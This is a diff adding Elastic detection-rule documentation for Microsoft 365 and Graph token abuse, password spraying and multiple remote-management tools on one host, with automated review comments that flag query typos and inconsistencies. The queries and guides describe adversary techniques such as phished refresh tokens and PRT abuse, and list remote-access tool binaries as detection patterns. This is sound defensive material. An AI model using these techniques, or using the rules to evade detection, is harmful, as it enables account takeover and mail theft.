+ + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "o365.audit" and event.provider: ("SharePoint" or "OneDrive") and + event.action: "SharingPolicyChanged" and event.outcome: "success" and + ( + (o365.audit.ModifiedProperties.ShareWithGuests.NewValue: (true or "Enabled") and + o365.audit.ModifiedProperties.ShareWithGuests.OldValue: (false or "Disabled")) + or + (o365.audit.ModifiedProperties.ShareUsingAnonymousLinks.NewValue: (true or "Enabled") and + o365.audit.ModifiedProperties.ShareUsingAnonymousLinks.OldValue: (false or "Disabled")) + or + (o365.audit.ModifiedProperties.IsPublic.NewValue: (true or "Enabled") and + o365.audit.ModifiedProperties.IsPublic.OldValue: (false or "Disabled")) + or + (o365.audit.ModifiedProperties.AllowGuestUser.NewValue: (true or "Enabled") and + o365.audit.ModifiedProperties.AllowGuestUser.OldValue: (false or "Disabled")) + or + (o365.audit.ModifiedProperties.AllowFederatedUsers.NewValue: (true or "Enabled") and + o365.audit.ModifiedProperties.AllowFederatedUsers.OldValue: (false or "Disabled")) + or + (o365.audit.ModifiedProperties.AllowTeamsConsumer.NewValue: (true or "Enabled") and + o365.audit.ModifiedProperties.AllowTeamsConsumer.OldValue: (false or "Disabled")) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ 
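Review bot: The `true`/`false` alternatives in every `NewValue`/`OldValue` clause are unquoted KQL terms; if `o365.audit.ModifiedProperties.*` is mapped as keyword rather than boolean, those terms are exact and case-sensitive and will not match the `True`/`False` spelling the guide itself attributes to Microsoft, leaving only the `Enabled`/`Disabled` settings able to fire — confirm the integration's mapping, or widen each list to `(true or "True" or "Enabled")` and `(false or "False" or "Disabled")`. A second gap is that every clause also requires a restrictive `OldValue`, so an event whose `OldValue` is absent or empty (presumably a first-time configuration of the setting) is dropped even when `NewValue` is permissive. If that is intentional, the guide should say so, e.g. `Events with no OldValue for the setting (for example a first-time configuration) do not match this rule and must be reviewed separately under SharingPolicyChanged.`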
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-email-access-by-unusual-user-and-client.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-email-access-by-unusual-user-and-client.asciidoc
new file mode 100644
index 0000000000..c3ca153d9f
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-email-access-by-unusual-user-and-client.asciidoc
@@ -0,0 +1,134 @@ +[[prebuilt-rule-8-19-18-microsoft-graph-request-email-access-by-unusual-user-and-client]] +=== Microsoft Graph Request Email Access by Unusual User and Client + +Identifies access to email resources via Microsoft Graph API using an first-party application on behalf of a user principal. This behavior may indicate an adversary using a phished OAuth refresh token or a Primary Refresh Token (PRT) to access email resources. The pattern includes requests to Microsoft Graph API endpoints related to email, such as /me/mailFolders/inbox/messages or /users/{user_id}/messages, using a public client application ID and a user principal object ID. This is a New Terms rule that only signals if the application ID and user principal object ID have not been seen doing this activity in the last 14 days. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.graphactivitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ +* https://github.com/dirkjanm/ROADtools +* https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/ +* https://pushsecurity.com/blog/consentfix + +*Tags*: + +* Domain: Cloud +* Domain: Email +* Data Source: Azure +* Data Source: Microsoft Graph +* Data Source: Microsoft Graph Activity Logs +* Use Case: Threat Detection +* Tactic: Collection +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Graph Request Email Access by Unusual User and Client* + + +This rule detects instances where a previously unseen or rare Microsoft Graph application client ID accesses email-related 
APIs, such as `/me/messages`, `/sendMail`, or `/mailFolders/inbox/messages`. These accesses are performed via delegated user credentials using common OAuth scopes like `Mail.Read`, `Mail.ReadWrite`, `Mail.Send`, or `email`. This activity may indicate unauthorized use of a newly consented or compromised application to read or exfiltrate mail content. This is a New Terms rule that only signals if the application ID (`azure.graphactivitylogs.properties.app_id`) and user principal object ID (`azure.graphactivitylogs.properties.user_principal_object_id`) have not been seen doing this activity in the last 14 days. + + +*Possible Investigation Steps:* + + +- `azure.graphactivitylogs.properties.app_id`: Investigate the application ID involved. Is it known and sanctioned in your tenant? Pivot to Azure Portal → Enterprise Applications → Search by App ID to determine app details, publisher, and consent status. +- `azure.graphactivitylogs.properties.scopes`: Review the scopes requested by the application. Email-related scopes such as `Mail.ReadWrite` and `Mail.Send` are especially sensitive and suggest the app is interacting with mail content. +- `url.path` / `azure.graphactivitylogs.properties.requestUri`: Determine exactly which mail-related APIs were accessed (e.g., reading inbox, sending messages, enumerating folders). +- `user.id`: Identify the user whose credentials were used. Determine if the user recently consented to a new app, clicked a phishing link, or reported suspicious activity. +- `user_agent.original`: Check for suspicious automation tools (e.g., `python-requests`, `curl`, non-browser agents), which may suggest scripted access. +- `source.ip` and `client.geo`: Investigate the source IP and geography. Look for unusual access from unexpected countries, VPS providers, or anonymizing services. +- `http.request.method`: Determine intent based on HTTP method — `GET` (reading), `POST` (sending), `PATCH`/`DELETE` (modifying/removing messages). 
+- `token_issued_at` and `@timestamp`: Determine how long the token has been active and whether access is ongoing or recent. +- `azure.graphactivitylogs.properties.c_sid`: Use the session correlation ID to identify other related activity in the same session. This may help identify if the app is accessing multiple users' mailboxes or if the same user is accessing multiple apps. +- Correlate with Microsoft Entra ID (`azure.auditlogs` and `azure.signinlogs`) to determine whether: + - The app was recently granted admin or user consent + - Risky sign-ins occurred just prior to or after mail access + - The same IP or app ID appears across multiple users + + +*False Positive Analysis* + + +- New legitimate apps may appear after a user consents via OAuth. Developers, third-party tools, or IT-supplied utilities may access mail APIs if users consent. +- Users leveraging Microsoft development environments (e.g., Visual Studio Code) may trigger this behavior with delegated `.default` permissions. +- Admin-approved apps deployed via conditional access may trigger similar access logs if not previously seen in detection baselines. + + +*Response and Remediation* + + +- If access is unauthorized or unexpected: + - Revoke the app's consent in Azure AD via the Enterprise Applications blade. + - Revoke user refresh tokens via Microsoft Entra or PowerShell. + - Investigate the user's session and alert them to possible phishing or OAuth consent abuse. +- Review and restrict risky OAuth permissions in Conditional Access and App Governance policies. +- Add known, trusted app IDs to a detection allowlist to reduce noise in the future. +- Continue monitoring the app ID for additional usage across the tenant or from suspicious IPs. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.graphactivitylogs + and azure.graphactivitylogs.properties.app_id:* + and azure.graphactivitylogs.result_signature:200 + and azure.graphactivitylogs.properties.c_idtyp:user + and azure.graphactivitylogs.properties.client_auth_method:0 + and http.request.method:(DELETE or GET or PATCH or POST or PUT) + and ( + ( + url.path:(/v1.0/me/*cc or /v1.0/users/*) + and ( + url.path:((*inbox* or *mail* or *messages*) and not *mailboxSettings*) + or azure.graphactivitylogs.properties.requestUri:(*inbox* or *mail* or *messages*) + ) + ) + or azure.graphactivitylogs.properties.scopes:(Mail.Read or Mail.ReadWrite or Mail.Send) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Email Collection +** ID: T1114 +** Reference URL: https://attack.mitre.org/techniques/T1114/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-user-impersonation-by-unusual-client.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-user-impersonation-by-unusual-client.asciidoc new file mode 100644 index 0000000000..bc6100a488 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-user-impersonation-by-unusual-client.asciidoc 
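Review bot: The path filter `url.path:(/v1.0/me/*cc or /v1.0/users/*)` looks like a typo or rendering artifact — `*cc` requires a `/me/` path to end in `cc`, so `/v1.0/me/messages` and `/me/mailFolders/inbox/messages`, both named in the description as target endpoints, do not satisfy the `url.path` branch and are only caught when the separate `scopes` branch happens to match. If any `/me/` resource is intended, the clause should read `url.path:(/v1.0/me/* or /v1.0/users/*)`; if `*cc` is deliberate, the description should say what it is meant to match. Separately, the triage steps never mention `azure.graphactivitylogs.properties.client_auth_method:0`, which appears to be the public-client filter the description alludes to; a sentence such as `client_auth_method 0 indicates a public client (no client secret or certificate), which is why replayed refresh tokens and PRT-derived tokens surface under this rule — confirm against the Graph activity log schema` would tell an analyst why that filter matters and when loosening it is unsafe.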
@@ -0,0 +1,145 @@ +[[prebuilt-rule-8-19-18-microsoft-graph-request-user-impersonation-by-unusual-client]] +=== Microsoft Graph Request User Impersonation by Unusual Client + +This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.graphactivitylogs-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ +* https://pushsecurity.com/blog/consentfix + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Graph +* Data Source: Microsoft Graph Activity Logs +* Resources: Investigation Guide +* Use Case: Identity and Access Audit +* Tactic: Initial Access + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Graph Request User Impersonation by Unusual Client* + + +This rule detects the first observed occurrence of a Microsoft Graph API request by a specific client application ID (`azure.graphactivitylogs.properties.app_id`) in combination with a user principal object ID (`azure.graphactivitylogs.properties.user_principal_object_id`) and tenant ID (`azure.tenant_id`) within specific number of days. 
This may indicate unauthorized access following a successful phishing attempt, token theft, or abuse of OAuth workflows. + +Adversaries frequently exploit legitimate Microsoft or third-party application IDs to avoid raising suspicion during initial access. By using pre-consented or trusted apps to interact with Microsoft Graph, attackers can perform actions on behalf of users without triggering conventional authentication alerts or requiring additional user interaction. + + +*Possible investigation steps* + + +- Review `azure.graphactivitylogs.properties.user_principal_object_id` and correlate with recent sign-in logs for the associated user. +- Determine whether `azure.graphactivitylogs.properties.app_id` is a known and approved application in your environment. +- Investigate the `user_agent.original` field for signs of scripted access (e.g., automation tools or libraries). +- Check the source IP address (`source.ip`) and geolocation data (`source.geo.*`) for unfamiliar origins. +- Inspect `azure.graphactivitylogs.properties.scopes` to understand the level of access being requested by the app. +- Examine any follow-up Graph API activity from the same `app_id` or `user_principal_object_id` for signs of data access or exfiltration. +- Correlate with device or session ID fields (`azure.graphactivitylogs.properties.c_sid`, if present) to detect persistent or repeat activity. + + +*False positive analysis* + + +- First-time use of a legitimate Microsoft or enterprise-approved application. +- Developer or automation workflows initiating new Graph API requests. +- Valid end-user activity following device reconfiguration or new client installation. +- Maintain an allowlist of expected `app_id` values and known developer tools. +- Suppress detections from known good `user_agent.original` strings or approved source IP ranges. +- Use device and identity telemetry to distinguish trusted vs. unknown activity sources. 
+- Combine with session risk or sign-in anomaly signals where available. + + +*Response and remediation* + + +- Reach out to the user and verify whether they authorized the application access. +- Revoke active OAuth tokens and reset credentials if unauthorized use is confirmed. +- Search for additional Graph API calls made by the same `app_id` or `user_principal_object_id`. +- Investigate whether sensitive resources (mail, files, Teams, contacts) were accessed. +- Apply Conditional Access policies to limit Graph API access by app type, IP, or device state. +- Restrict user consent for third-party apps and enforce admin approval workflows. +- Monitor usage of new or uncommon `app_id` values across your tenant. +- Provide user education on OAuth phishing tactics and reporting suspicious prompts. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.graphactivitylogs" + and event.type: "access" + and azure.graphactivitylogs.properties.app_id: * + and azure.graphactivitylogs.properties.c_idtyp: "user" + and azure.graphactivitylogs.properties.client_auth_method: 0 + and http.response.status_code: 200 + and url.domain: "graph.microsoft.com" + and not url.path: ( + /v1.0/organization + or /v1.0/me/licenseDetails + or /v1.0/me/photo* + or /v1.0/me/photos* + or /beta/me/settings/regionalAndLanguageSettings + or /v1.0/me/drive/special/copilotuploads + or /v1.0/me/informationProtection/sensitivityLabels + or /beta/me/informationProtection/dataLossPreventionPolicies + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Credential Access +** ID: 
TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-logon-failure-from-the-same-source-address.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-logon-failure-from-the-same-source-address.asciidoc new file mode 100644 index 0000000000..3d7878513a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-logon-failure-from-the-same-source-address.asciidoc 
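Review bot: The success filter here is `http.response.status_code: 200`, whereas the sibling rule "Microsoft Graph Request Email Access by Unusual User and Client" in the same package filters on `azure.graphactivitylogs.result_signature:200` for the same data source; if both fields are populated the two rules behave alike, but exceptions and tuning across the pair are easier to reason about if they key on one field, so one of them should be aligned. The description also carries typos that render verbatim in the UI — `Advesaries may succesfully` → `Adversaries may successfully`, and `This rule may helps identify` → `This rule may help identify`. Finally, the guide says the new-terms baseline is `within specific number of days` without naming the value; the email-access rule states its window explicitly, and this guide should do the same rather than leave the baseline unspecified.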
@@ -0,0 +1,175 @@ +[[prebuilt-rule-8-19-18-multiple-logon-failure-from-the-same-source-address]] +=== Multiple Logon Failure from the same Source Address + +Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625 +* https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4624 +* https://social.technet.microsoft.com/Forums/ie/en-US/c82ac4f3-a235-472c-9fd3-53aa646cfcfd/network-information-missing-in-event-id-4624?forum=winserversecurity +* https://serverfault.com/questions/379092/remote-desktop-failed-logon-event-4625-not-logging-ip-address-on-2008-terminal-s/403638#403638 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide +* Data Source: Windows Security Event Logs + +*Version*: 118 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Multiple Logon Failure from the same Source Address* + + +Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found https://attack.mitre.org/techniques/T1110/001/[here]. 
+ +This rule identifies potential password guessing/brute force activity from a single address. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the logon failure reason code and the targeted user names. + - Prioritize the investigation if the account is critical or has administrative privileges over the domain. +- Investigate the source IP address of the failed Network Logon attempts. + - Identify whether these attempts are coming from the internet or are internal. +- Investigate other alerts associated with the involved users and source host during the past 48 hours. +- Identify the source and the target computer and their roles in the IT environment. +- Check whether the involved credentials are used in automation or scheduled tasks. +- If this activity is suspicious, contact the account owner and confirm whether they are aware of it. +- Examine the source host for derived artifacts that indicate compromise: + - Observe and collect information about the following activities in the alert source host: + - Attempts to contact external domains and addresses. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity + + +*False positive analysis* + + +- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state. +- Authentication misconfiguration or obsolete credentials. +- Service account password expired. +- Domain trust relationship issues. +- Infrastructure or availability issues. + + +*Related rules* + + +- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60 + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the source host to prevent further post-compromise behavior. +- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. 
If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Setup + + + +*Setup* + + +- In some cases the source network address in Windows events 4625/4624 is not populated due to Microsoft logging limitations (examples in the references links). This edge case will break the rule condition and it won't trigger an alert. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index +| where event.category == "authentication" and host.os.type == "windows" and event.action == "logon-failed" and + winlog.logon.type == "Network" and source.ip is not null and winlog.computer_name is not null and + not cidr_match(TO_IP(source.ip), "127.0.0.0/8", "::1") and + not user.name in ("ANONYMOUS LOGON", "-") and not user.name like "*$" and user.domain != "NT AUTHORITY" and + /* + noisy failure status codes often associated to authentication misconfiguration + 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine. + 0XC000005E - There are currently no logon servers available to service the logon request. 
+ 0XC0000133 - Clocks between DC and other computer too far out of sync. + 0XC0000192 An attempt was made to logon, but the Netlogon service was not started. + 0xc00000dc - DC is in shutdown phase, it will normally tell current clients to use another DC for authentication. + */ + not winlog.event_data.Status in ("0xc000015b", "0xc000005e", "0xc0000133", "0xc0000192", "0xc00000dc") +// truncate the timestamp to a 60-second window +| eval Esql.time_window = date_trunc(60 seconds, @timestamp) +| stats Esql.failed_auth_count = COUNT(*), + Esql.count_distinct_target_user_name = count_distinct(winlog.event_data.TargetUserName), + Esql.target_user_name_values = VALUES(winlog.event_data.TargetUserName), + Esql.user_domain_values = VALUES(user.domain), + Esql.error_codes = VALUES(winlog.event_data.Status), + Esql.data_stream_namespace.values = VALUES(data_stream.namespace) by winlog.computer_name, source.ip, Esql.time_window, winlog.logon.type +| where Esql.failed_auth_count >= 100 and Esql.count_distinct_target_user_name >= 2 +| eval user.name = MV_FIRST(Esql.target_user_name_values) +| KEEP winlog.computer_name, source.ip, user.name, Esql.time_window, winlog.logon.type, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-remote-management-tool-vendors-on-same-host.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-remote-management-tool-vendors-on-same-host.asciidoc new file mode 100644 index 0000000000..a832d6ece5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-remote-management-tool-vendors-on-same-host.asciidoc 
@@ -0,0 +1,226 @@ +[[prebuilt-rule-8-19-18-multiple-remote-management-tool-vendors-on-same-host]] +=== Multiple Remote Management Tool Vendors on Same Host + +Identifies a Windows host where two or more distinct remote monitoring and management (RMM) or remote-access tool vendors are observed starting processes within the same eight-minute window. Legitimate MSP environments may run multiple tools, but this pattern can also indicate compromise, shadow IT, or attacker staging of redundant access. Processes are mapped to a single vendor label so multiple binaries from the same vendor do not inflate the count. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 8m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1219/ +* https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: CrowdStrike +* Data Source: Windows Security Event Logs +* Data Source: Elastic Endgame +* Data Source: Winlogbeat + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Multiple Remote Management Tool Vendors on Same Host* + + +This rule aggregates process start events by `host.id`, host name, and a nine-minute time bucket. Data can come from +Elastic Defend, Sysmon, Winlogbeat, Windows Security / forwarded events, Microsoft Defender for Endpoint, SentinelOne, +CrowdStrike FDR, or Elastic Endgame—where ECS process fields are populated. 
Each known RMM-related process name maps +to one **vendor** label (e.g. TeamViewer, AnyDesk, ScreenConnect). If **two or more different vendor labels** appear in +the same bucket, the rule signals. + + +*Possible investigation steps* + + +- Open **Esql.vendors_seen** and **Esql.processes_name_values** on the alert to see which tools fired in the window. +- Confirm whether the host is an MSP-managed jump box, helpdesk workstation, or lab where multiple RMM stacks are expected. +- For servers or standard user endpoints, treat as higher risk: review install source, code signatures, and recent logons. +- Correlate with other alerts (ingress tool transfer, suspicious scripting, new persistence) on the same `host.id`. +- Check asset inventory and change tickets for approved RMM software. + + +*False positive analysis* + + +- **MSP / IT tooling**: A technician machine with two approved agents (e.g. RMM + remote support) may match. Tune with + host or organizational unit exceptions, or raise the vendor threshold if your environment standardizes on a known pair. +- **Vendor rebrands or bundles**: Rare overlaps during migrations can briefly show two vendors; validate timeline and packages. + + +*Response and remediation* + + +- If unauthorized or unexplained: isolate the host, inventory installed remote-access software, remove unapproved tools, + and reset credentials that may have been exposed. Enforce a single approved RMM stack per asset class where possible. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.process-*, endgame-*, logs-crowdstrike.fdr*, logs-m365_defender.event-*, logs-sentinel_one_cloud_funnel.*, logs-system.security*, logs-windows.sysmon_operational-*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index +| where (host.os.type == "windows" or host.os.family == "windows") + and event.category == "process" + and event.type == "start" + and process.name is not null +| eval Esql.rmm_vendor = case( + process.name == "AeroAdmin.exe", "AeroAdmin", + process.name == "AnyDesk.exe", "AnyDesk", + process.name == "AteraAgent.exe", "Atera", + process.name == "AweSun.exe", "AweSun", + process.name like "aweray_remote*.exe", "AweSun", + process.name == "apc_Admin.exe", "APC", + process.name == "apc_host.exe", "APC", + process.name == "BASupSrvc.exe", "BeyondTrust", + process.name == "bomgar-scc.exe", "BeyondTrust", + process.name == "Remote Support.exe", "BeyondTrust", + process.name == "B4-Service.exe", "BeyondTrust", + process.name == "CagService.exe", "BarracudaRMM", + process.name == "domotzagent.exe", "Domotz", + process.name == "domotz-windows-x64-10.exe", "Domotz", + process.name == "dwagsvc.exe", "DWService", + process.name == "DWRCC.exe", "DWService", + process.name like "fleetdeck_commander*.exe", "FleetDeck", + process.name == "getscreen.exe", "GetScreen", + process.name == "g2aservice.exe", "GoTo", + process.name == "GoToAssistService.exe", "GoTo", + process.name == "gotohttp.exe", "GoTo", + process.name == "GoToResolveProcessChecker.exe", "GoTo", + process.name == "GoToResolveUnattended.exe", "GoTo", + process.name == "ImperoClientSVC.exe", "Impero", + process.name == "ImperoServerSVC.exe", "Impero", + process.name == "ISLLight.exe", "ISLOnline", + process.name == "ISLLightClient.exe", "ISLOnline", + process.name == "jumpcloud-agent.exe", "JumpCloud", + process.name == "level.exe", "Level", + process.name == "LvAgent.exe", "Level", + 
process.name == "LMIIgnition.exe", "LogMeIn", + process.name == "LogMeIn.exe", "LogMeIn", + process.name == "ManageEngine_Remote_Access_Plus.exe", "ManageEngine", + process.name == "MeshAgent.exe", "MeshCentral", + process.name == "meshagent.exe", "MeshCentral", + process.name == "Mikogo-Service.exe", "Mikogo", + process.name == "NinjaRMMAgent.exe", "NinjaOne", + process.name == "NinjaRMMAgenPatcher.exe", "NinjaOne", + process.name == "ninjarmm-cli.exe", "NinjaOne", + process.name == "parsec.exe", "Parsec", + process.name == "PService.exe", "Pulseway", + process.name == "r_server.exe", "Radmin", + process.name == "radmin.exe", "Radmin", + process.name == "radmin3.exe", "Radmin", + process.name == "rserver3.exe", "Radmin", + process.name == "vncserver.exe", "RealVNC", + process.name == "vncviewer.exe", "RealVNC", + process.name == "winvnc.exe", "RealVNC", + process.name == "ROMServer.exe", "RealVNC", + process.name == "ROMViewer.exe", "RealVNC", + process.name == "RemotePC.exe", "RemotePC", + process.name == "RemotePCDesktop.exe", "RemotePC", + process.name == "RemotePCService.exe", "RemotePC", + process.name == "RemoteDesktopManager.exe", "Devolutions", + process.name == "RCClient.exe", "RPCSuite", + process.name == "RCService.exe", "RPCSuite", + process.name == "RPCSuite.exe", "RPCSuite", + process.name == "rustdesk.exe", "RustDesk", + process.name == "rutserv.exe", "RemoteUtilities", + process.name == "rutview.exe", "RemoteUtilities", + process.name == "saazapsc.exe", "Kaseya", + process.name like "ScreenConnect*.exe", "ScreenConnect", + process.name == "ScreenConnect.ClientService.exe", "ScreenConnect", + process.name == "Splashtop-streamer.exe", "Splashtop", + process.name == "strwinclt.exe", "Splashtop", + process.name == "SRService.exe", "Splashtop", + process.name == "smpcview.exe", "Splashtop", + process.name == "spclink.exe", "Splashtop", + process.name == "rfusclient.exe", "Splashtop", + process.name == "Supremo.exe", "Supremo", + process.name == 
